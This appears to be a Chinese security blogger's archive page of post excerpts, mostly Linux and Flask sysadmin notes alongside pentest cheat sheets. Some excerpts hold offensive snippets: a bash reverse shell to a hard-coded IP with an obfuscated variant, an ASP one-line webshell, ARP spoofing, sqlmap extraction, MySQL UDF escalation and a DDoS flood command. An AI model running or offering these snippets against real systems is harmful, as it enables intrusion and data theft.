2018年3月18日
dsniff
摘要: ### 实例 arpspoof 和dsniff必须配合才可以成功截获同网关内的数据包 1.首先打开本机的路由转发功能 echo 1 > /proc/sys/net/ipv4/ip_forward 2.进行arp欺骗 #arpspoof -i wlan0 网卡接口 -t 指定一个进行arp欺骗的目标, 阅读全文
posted @ 2018-03-18 17:10 数字安全极客 阅读(756) 评论(0) 推荐(0)
NetCat
摘要: ## 基本用法 ### 1.连接到REMOTE主机 格式:nc -nvv 218.241.212.141 80 讲解:连到192.168.x.x的TCP80端口### 2.监听LOCAL主机 格式:nc -l -p 80 讲解:监听本机的TCP80端口### 3.扫描远程主机 格式:nc -nvv 阅读全文
posted @ 2018-03-18 17:08 数字安全极客 阅读(106) 评论(0) 推荐(0)
Nmap
摘要: ## 1.nmap功能介绍 * 1.主机存活检测* 2.端口探测* 3.服务识别* 4.操作系统识别* 5.硬件地址检测* 6.服务版本识别* 7.漏洞扫描,使用nmap自带脚本## 2.简单示例使用ping检测10.0.0.0/24这个网段 nmap -sP 10.0.0.0/24使用SYN的方法 阅读全文
posted @ 2018-03-18 17:07 数字安全极客 阅读(366) 评论(0) 推荐(0)
Mysql
摘要: # 数据库常用资源 ## MySQL常用命令 ### 登录数据库 mysql -h localhost -uroot -p ### 导出数据库 mysqldump -uroot -p db > db.sql ### 导入数据库 mysql -uroot -p db < db.sql // or my 阅读全文
posted @ 2018-03-18 17:00 数字安全极客 阅读(82) 评论(0) 推荐(0)
sock代理nessus
摘要: # sock代理nessus proxychains https://hyperdrivesecurity.com/blog/2017/6/15/can-i-vuln-scan-through-a-socks-proxy 阅读全文
posted @ 2018-03-18 16:45 数字安全极客 阅读(964) 评论(0) 推荐(0)
tcpdump
摘要: Tcpdump监听网卡 监听lo tcpdump -i lo port 80 -X监听eth0 tcpdump -i eth0 port 80 -X监视指定网络接口的数据包 tcpdump -i eth1 ```监视指定主机的数据包打印所有进入或离开sundown的数据包. tcpdump host 阅读全文
posted @ 2018-03-18 16:42 数字安全极客 阅读(71) 评论(0) 推荐(0)
find
摘要: ·find path -option [ -print ] [ -exec -ok command ] {} \; find命令的参数; pathname: find命令所查找的目录路径。例如用.来表示当前目录,用/来表示系统根目录。 -print: find命令将匹配的文件输出到标准输出。 -exec: find命令对匹配的文件执行该参数所给出的shell命令。... 阅读全文
posted @ 2018-03-18 16:40 数字安全极客 阅读(449) 评论(0) 推荐(0)
安全评估加固工具
摘要: 企业要求其计算机系统具有高度的安全性。服务器攻击或恶意软件入侵可能会造成不可估量的损失。本文介绍了最常用的服务器审计和测试工具,以及渗透测试和网络安全工具。 大多数企业倾向于向其客户提供Web服务,因为互联网的存在非常重要,因为诸如高收入潜力,广泛客户的接触等因素。使得企业服务易受各种与Web应用程 阅读全文
posted @ 2018-03-18 16:36 数字安全极客 阅读(640) 评论(0) 推荐(0)
常用命令CMD
摘要: 系统命令资源 ## Linux常用指令### Tcpdump监听网卡#### 监听lo tcpdump -i lo port 80 -X#### 监听eth0 tcpdump -i eth0 port 80 -X ### 文件夹操作 查看文件夹大小 du -h --max-depth=1 /home 阅读全文
posted @ 2018-03-18 16:21 数字安全极客 阅读(121) 评论(0) 推荐(0)
Docker
摘要: ## Docker.io yum install docker-io /etc/init.d/docker restart ### Action docker version docker -h docker search tutorial docker pull learn/tutorial do 阅读全文
posted @ 2018-03-18 16:19 数字安全极客 阅读(59) 评论(0) 推荐(0)
GnuPG
摘要: https://www.gnupg.org/howtos/zh/index.html 阅读全文
posted @ 2018-03-18 16:16 数字安全极客 阅读(56) 评论(0) 推荐(0)
十条命令检查Linux服务器性能
摘要: 如果你的Linux服务器突然负载暴增,告警短信快发爆你的手机,如何在最短时间内找出Linux性能问题所在?来看Netflix性能工程团队的这篇博文,看它们通过十条命令在一分钟内对机器性能问题进行诊断。 概述 通过执行以下命令,可以在1分钟内对系统资源使用情况有个大致的了解。 uptime dmesg 阅读全文
posted @ 2018-03-18 16:15 数字安全极客 阅读(153) 评论(0) 推荐(0)
Windows CMD
摘要: Windows常用系统命令 # Windows命令### 一句话 echo ^<%eval request("#")%^> > D:\h4ck.asp### 文件夹操作 Md hackdir #创建 Rd hackdir #删除 Dir c:\ #查看c盘根目录全部文件夹和文件信息 Tree e:\ 阅读全文
posted @ 2018-03-18 15:35 数字安全极客 阅读(120) 评论(0) 推荐(0)
Linux CMD
摘要: Linux常用系统命令 # 网络操作 netstat -tulpn Show Linux network ports with process IDs (PIDs) watch ss -stplu Watch TCP, UDP open ports in real time with socket 阅读全文
posted @ 2018-03-18 15:11 数字安全极客 阅读(246) 评论(0) 推荐(0)
Dante搭建Socks5代理
摘要: Dante+Proxifier搭建Socks5服务端和客户端 ### Proxifier Windows客户端使用 http://bbs.ngacn.cc/read.php?tid=3021548### Dante-server 服务端搭建 http://www.asklinux.com/linux 阅读全文
posted @ 2018-03-18 14:58 数字安全极客 阅读(2039) 评论(0) 推荐(0)
http proxy
摘要: export http_porxy=yourproxy.com:port export https_proxy=yourproxy.com:port export http_proxy=http://domain\\user:pwd@proxy_addr:port export https_proxy= http://domain\\user:pwd@proxy_addr:port ... 阅读全文
posted @ 2018-03-18 14:56 数字安全极客 阅读(182) 评论(0) 推荐(0)
iptables
摘要: iptables -F iptables -X iptables -Z iptables -P INPUT DROP iptables -A INPUT -i lo -j ACCEPT iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT iptables -A INPUT -p tcp --dport 21 -j A... 阅读全文
posted @ 2018-03-18 14:54 数字安全极客 阅读(86) 评论(0) 推荐(0)
rsync
摘要: rsync -v --list-only --port=29989 mhgame@mcs.millionhero.com::mh head 0.lst rsyn -c -a rsync://115.231.46.37/gfs/data3/bc/f62/e4169441 /gfs/data0/ rsync -c -a rsync://115.231.46.37/gfs/data3/bc/f62... 阅读全文
posted @ 2018-03-18 14:47 数字安全极客 阅读(98) 评论(0) 推荐(0)
nfs
摘要: $ showmount -e 192.168.0.96 Export list for 192.168.0.96: /backup/gz 192.168.0.23/32,192.168.0.102/32,192.168.0.40 /backup/webbg_script 192.168.0.0/22 /backup/dw_bak 192.168.... 阅读全文
posted @ 2018-03-18 14:47 数字安全极客 阅读(91) 评论(0) 推荐(0)
ssh自动输入密码
摘要: #!/usr/bin/expect set timeout 2 spawn ssh -p [lindex $argv 0] [lindex $argv 1]@[lindex $argv 2] expect { "(yes/no)?" {send "yes\n";exp_continue} "password:" {send "[l... 阅读全文
posted @ 2018-03-18 14:44 数字安全极客 阅读(634) 评论(0) 推荐(0)
python SimpleHTTPServer
摘要: # 用Python建立最简单的web服务器 $ python -m SimpleHTTPServer 8080# 支持开发功能的 基础web from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler class TestHTTPHan 阅读全文
posted @ 2018-03-18 14:41 数字安全极客 阅读(93) 评论(0) 推荐(0)
pssh-parallel-ssh
摘要: Linux系统下有很多可用的集中管理方案,例如著名的puppet,这个是用ruby开发,号称可以管理以万计的服务器。不过对于大多数SA来说,这个不怎么轻量,设置有点复杂。 这里推荐PSSH,比DSH更强大的批量管理工具,先来看下它的命令列表。 pssh 包安装 5 个实用程序: parallel-s 阅读全文
posted @ 2018-03-18 14:39 数字安全极客 阅读(184) 评论(0) 推荐(0)
iostat
摘要: iostat -x 1 10 如果 iostat 没有,要 yum install sysstat avg-cpu: %user %nice %sys %iowait %idle 0.00 0.00 0.25 33.46 66.29 Device: rrqm/s wrqm/s r/s w/s rse 阅读全文
posted @ 2018-03-18 14:38 数字安全极客 阅读(98) 评论(0) 推荐(0)
hdparm磁盘性能
摘要: # hdparm -Tt /dev/sda /dev/sda: Timing cached reads: 6676 MB in 2.00 seconds = 3340.18 MB/sec Timing buffered disk reads: 218 MB in 3.11 seconds = 70. 阅读全文
posted @ 2018-03-18 14:37 数字安全极客 阅读(84) 评论(0) 推荐(0)
lsof
摘要: lsof filename 显示打开指定文件的所有进程lsof -a 表示两个参数都必须满足时才显示结果lsof -c string 显示COMMAND列中包含指定字符的进程所有打开的文件lsof -u username 显示所属user进程打开的文件lsof -g gid 显示归属gid的进程情况 阅读全文
posted @ 2018-03-18 14:35 数字安全极客 阅读(75) 评论(0) 推荐(0)
Flask04-SQL
摘要: from flask import render_template, flash, redirect from app import app from app import db, models from forms import LoginForm, SheetForm, VulForm, EveForm import datetime import time // 原始SQL ... 阅读全文
posted @ 2018-03-18 13:56 数字安全极客 阅读(103) 评论(0) 推荐(0)
Flask03-Form
摘要: ## Web 表单 配置 为了能够处理 web 表单,我们将使用 Flask-WTF ,该扩展封装了 WTForms 并且恰当地集成进 Flask 中。 许多 Flask 扩展需要大量的配置,因此我们将要在 microblog 文件夹的根目录下创建一个配置文件以至于容易被编辑。这就是我们将要开始的(文件 config.py): $ config.py > C... 阅读全文
posted @ 2018-03-18 13:55 数字安全极客 阅读(141) 评论(0) 推荐(0)
Flask02-Template
摘要: ## 基础使用 $ vim app/templates/index.html > > > {{title}} - microblog > > > Hello, {{user.nickname}}! > > $ vim app/views.py > from ... 阅读全文
posted @ 2018-03-18 13:53 数字安全极客 阅读(151) 评论(0) 推荐(0)
Flask01-HelloWorld
摘要: # flask学习 参考:http://www.pythondoc.com/flask-mega-tutorial/ ## python3.4 默认支持虚拟环境使用(用最简单的方法,解决问题) wget python3.4 && ./configure && make && make install ## 创建一个虚拟环境 //这个环境能够安装所有的东西,而主P... 阅读全文
posted @ 2018-03-18 13:52 数字安全极客 阅读(170) 评论(0) 推荐(0)
Shell Write File
摘要: ruby -e 'f=File.new("test.txt", "w") ;f.write("test") ' python -c "f=open('test.txt','a');f.write('line.')" python -c "with open('test.txt', 'a') as the_file:the_file.write('test')" perl -e &quo 阅读全文
posted @ 2018-03-18 13:34 数字安全极客 阅读(142) 评论(0) 推荐(0)
Reverse Shell
摘要: bash: /bin/bash -i >& /dev/tcp/116.196.82.241/8888 0>&1echo '/bin/bash -i >& /dev/tcp/116.196.82.241/8888 0>&1' > /tmp/a.sh a=$'\057bin\057bash -i \07 阅读全文
posted @ 2018-03-18 13:32 数字安全极客 阅读(129) 评论(0) 推荐(0)
Find WebShell
摘要: ### Grep ### Find 阅读全文
posted @ 2018-03-18 13:28 数字安全极客 阅读(153) 评论(0) 推荐(0)
Mysql UDF
摘要: ### 是否降权 select load_file('c:\\boot.ini') ### 查看目录 select @@basedir ### 查询导入目录 SHOW VARIABLES LIKE '%plugin%'; ### 开启外链 GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT ... 阅读全文
posted @ 2018-03-18 13:21 数字安全极客 阅读(1723) 评论(0) 推荐(0)
Sqlmap
摘要: sqlmap -u "http://url/news?id=1" --current-user #获取当前用户名称 sqlmap -u "http://www.xxoo.com/news?id=1" --current-db #获取当前数据库名称 sqlmap -u "http://www.xxoo.com/news?id=1" --tables -D "db_name" #列表名 ... 阅读全文
posted @ 2018-03-18 13:18 数字安全极客 阅读(180) 评论(0) 推荐(0)
LCX
摘要: /* Socket 1data transport tool * [bkbll@mobile socket]$ uname -a * Linux mobile 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux * [bkbll@mobile socket]$ gcc -o trtool trtool.c *... 阅读全文
posted @ 2018-03-18 13:14 数字安全极客 阅读(403) 评论(0) 推荐(0)
DDoS压力测试工具t50
摘要: site: https://sourceforge.net/projects/t50/ 例子:t50 192.168.1.1 --flood--protocol T50|TCP|UDP|ICMP--threshold 500--floodt50 --flood --protocol TCP 192. 阅读全文
posted @ 2018-03-18 10:38 数字安全极客 阅读(3251) 评论(0) 推荐(0)
如何维护更新日志
摘要: 参考网址:http://keepachangelog.com/zh-CN/0.3.0/ 更新日志绝对不应该是git日志的堆砌物 Version 0.3.0 更新日志是什么? 更新日志(Change Log)是一个由人工编辑,以时间为倒叙的列表。 这个列表记录所有版本的重大变动。 # Change L 阅读全文
posted @ 2018-03-18 10:25 数字安全极客 阅读(460) 评论(0) 推荐(0)
每个项目都要保持Git好习惯
摘要: # 本地Git操作 $ cd /project/ $ git init $ git log #查看提交历史 $ git reset –hard commit-id 回退 #代码提交 $ git pull $ git add –all $ git commit -m ‘comment’ $ git p 阅读全文
posted @ 2018-03-18 10:19 数字安全极客 阅读(155) 评论(0) 推荐(0)
Flask-install-python2.6
摘要: 命令: 参考:https://dormousehole.readthedocs.org/en/latest/index.html Flask模版(支持表单和ORM): https://github.com/miguelgrinberg/microblog/archive/v0.4.zip 阅读全文
posted @ 2018-03-18 09:52 数字安全极客 阅读(302) 评论(0) 推荐(0)